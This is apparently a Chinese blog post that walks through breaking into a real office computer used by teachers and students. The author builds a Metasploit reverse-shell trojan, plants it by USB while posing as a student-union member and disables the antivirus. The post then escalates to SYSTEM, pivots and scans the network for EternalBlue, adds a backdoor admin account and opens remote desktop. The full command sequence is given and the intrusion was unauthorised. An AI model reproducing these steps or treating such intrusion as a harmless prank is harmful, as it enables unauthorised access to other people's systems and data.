使用msf+社会工程学 提权内网并留下纪念

本人菜鸡一枚,写这篇文章只为了记录一下我的过程以及替其他小白提供一点帮助吧

在经历了研究msf半个月的时间内,了解到msf的确是内网中的一把利剑但遗憾的是当时试过使用Msf+Ngork内网映射尝试外网环境反弹内网的shell,不知道为什么经常中断,就不了了之了,但是我并没有放弃,于是嘛~~

氪金!玄不救非,氪不改命

于是我就买了一个腾讯云服务器,

在控制台把公网ip转换为弹性

在控制台把公网ip转换为弹性

在控制台把公网ip转换为弹性

重要的事情说三遍,不然是无法反弹shell的

学生价很便宜,推荐购买,我搭建了一个ubuntu系统,

在简单的apt-get update apt-get upgrade ........之后


使用katoolin安装了msf


这里是katoolin的下载地址git clone https://github.com/LionSec/katoolin.git

图片发自简书App

1 然后回车 再1 就成功添加了kali的源


再apt-get install metasploit-framework

就正常安装msf5了

图片发自简书App


然后就先使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(你的服务器公网IP) LPORT=(随便一个端口,例如我的999) -f exe -o /root/1.exe 

这个命令生成一个木马,木马路径在/root/文件下

lhost就是你的公网IP,lport就是你的监听端口


然后我们启动msf,命令 msfconsole

图片发自简书App

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.105.0.9 (这里是服务器私网IP!)

set LPORT 999 (这里是监听端口,和木马设置的一样就ok)

exploit 开始监听,等待对方打开文件

图片发自简书App


接下来因每个人目的不同,我的目标机器是办公楼的一台主机,里面全是老师和一些学生会的人,于是我就装成学生会去打印文件???,于是等了一会儿,终于插上U盘,复制文件到启动项,以备不时之需,哦豁,360马上给我删了,没办法,我是个菜鸡,试过免杀也没过去,一不做二不休,直接关了防火墙和退出360,,拿下shell,开溜。。,,(虽然附近人看着我怪怪的)然后成功反弹到shell,(因为我已经成功的做了想做的事情,删掉了木马,后面就没有截图了)

图片发自简书App


监听成功,获得meterpreter。

getuid,是查看主机名

我当时只是一个administrator,并不是最高的system,于是就用

ps 查看进程id

找到system的进程,

(因为我这边的system进程id为1022,所以我就转移到了1022)

migrate 1022

再getuid 查看


就提升到了system权限了

然后 run get_local_subnets

获取目标地址网段

我这边为192.168.15.0/255.255.0.0


于是直接添加去往目标网段的路由

run autoroute -s 192.168.15.0/255.255.0.0

再使用

run autoroute -p

我已经成功添加一条路由

192.168.15.0 255.255.255.0

background

可以返回后台,并保存会话

使用sessions -i 查看会话

sessions -i (会话id)连接会话

因为我们现在已经在192.168.15.0/24这个网段下,所以可以使用nmap或其他漏洞扫描工具

扫描内网主机漏洞

使用“永恒之蓝”漏洞扫描模块进行内网所有主机进行漏洞扫描。

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.15.0/24

set threads 50

run


结果我这边发现

192.168.15.3

192.168.15.245两台机器存在永恒之蓝漏洞

图片发自简书App


于是就草草写了一个doc,待会有大作用

因为我的后台会话id为1

所以我直接sessions -i 1

连接shell,

输入

shell

可以直接在cmd下添加用户

net user test test123 /add

net localgroup administrators test /add

成功将用户test加冕为王,此时

exit

返回meterpreter会话

upload /root/test.doc C:\

上传我的doc到主机c盘根目录下

图片发自简书App

图片发自简书App

然后使用

run getgui -e  开启目标主机3389

不知道为什么好像不行,就用cmd打开了

图片发自简书App

然后因为我们还在同一个网段下面,直接

apt install rdesktop

安装rdesktop,

然后就直接rdesktop

rdesktop -u test -p test123 -g 1024*720 192.168.15.3

连接上目标主机

打开我们c盘下的test.doc

打开后,选择打印,emmmm,一百张~

图片发自简书App

然后删木马,清日志,(我好像没清。。就跑了。。)

图片发自简书App


 完美,现在,已经成功实现了很多人曾经的那个中二梦。~~,

有人敲门,我的快递可能到了,告辞

转载请注明出处,请勿用于违法犯罪,开心就好,一切后果概不负责,

tail tail

图片发自简书App
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,047评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,807评论 3 386
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,501评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,839评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,951评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,117评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,188评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,929评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,372评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,679评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,837评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,536评论 4 335
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,168评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,886评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,129评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,665评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,739评论 2 351

推荐阅读更多精彩内容